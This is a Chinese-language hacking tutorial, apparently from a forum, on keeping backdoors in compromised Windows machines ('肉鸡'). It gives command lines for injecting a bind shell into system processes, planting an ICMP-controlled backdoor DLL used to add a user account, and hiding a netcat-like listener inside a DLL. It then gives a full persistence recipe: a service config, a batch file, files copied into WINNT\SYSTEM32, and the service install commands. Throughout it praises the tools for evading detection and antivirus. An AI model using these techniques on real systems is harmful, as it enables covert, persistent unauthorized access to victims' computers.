◆ 几种有用的后门技术的应用--精华 ◆...

几种有用的后门技术的应用 ======================== ------------------------- 一. 应用 1.在系统进程中插入SHELL 先上传InjShell.exe 到肉鸡 用法： 先查一下系统进程 用PSLIST.EXE PV.EXE 等查 一般有SMSS.EXE internat.exe svchost.exe conime.exe 等 InjShell.exe （进程.EXE） SHELLPORT 如 InjShell.exe internat.exe 1234 成功后 telnet ip 1234 就可以的到一个SYSTEM的CMD SHELL ！ 非常不错的后门，由于是系统进程所以很难被发现，也不会被查杀 随系统启动。 ----------------- 2.在系统进程插入DLL 用法： InjDll.exe （系统进程.EXE ） ICMP.DLL（后门DLL） 然后用客户端 IcmpReplySend.exe IP CMD 如IcmpReplySend.exe 127.0.0.1 “net user czh /add" 这样我们随时可以远程运行命令（SYSTEM权限的）并且是采用ICMP通讯，不开PORT，安全，可*，隐密！ 刚完成测试，很不错 ，不过ICMP封包是名文的，用IRis抓到 ------------------------- 3.在DLL中插入EXE 用法：SetDll.exe <ExeName> <DllName> 如 SetDll.exe NCX99.EXE NTDLL.DLL （为系统进程必用DLL库文件） 然后telnet 127.0.0.1 99 这样NCX99.EXE就不出现在进程中。 ---------------------------------------------------- ---------------------------------------------------- 二.补充：经测试后有一个问题，重启后不能再用，不过我想了一个办法，如下： 用ntservice.exe 把这几个文件安装成服务启动，方法如下 ： 1.建一个ntservice.ini文件,内容如下： [Settings] ServiceName = NTService （这行代表服务名） LogEnable = 0 ProcCount = 1 [Process0] CommandLine =system.bat （这行代表服务所要启动的文件） PauseStart = 1000 PauseEnd = 1000 UserInterface = No （这行代表后台运行） ========================================= 2.建一个system.bat文件如下： echo off InjDll.exe svchost.exe IcmpAttach.dll InjShell internat.exe 1234 SetDll.exe NCX99.EXE NTDLL.DLL ======================================== 3.把以上的InjDll.exe ，IcmpAttach.dll， ntservice.exe ，SetDll.exe， NCX99.EXE， ntservice.ini， system.bat 全部COPY到肉鸡 的WINNT\SYSTEM32文件夹中。 ======================================= 4. 安装： ntservice.exe -install net start ntservice 然后你就可以用这几个后门了，开机就能启动了！ =========================================== 5.卸载 net stop ntservice ntservice.exe -remove ========================================== 6.由于把SYSTEM.BAT加入到RUN键中开机会有CMD窗口，所以选择了安装成服务启动。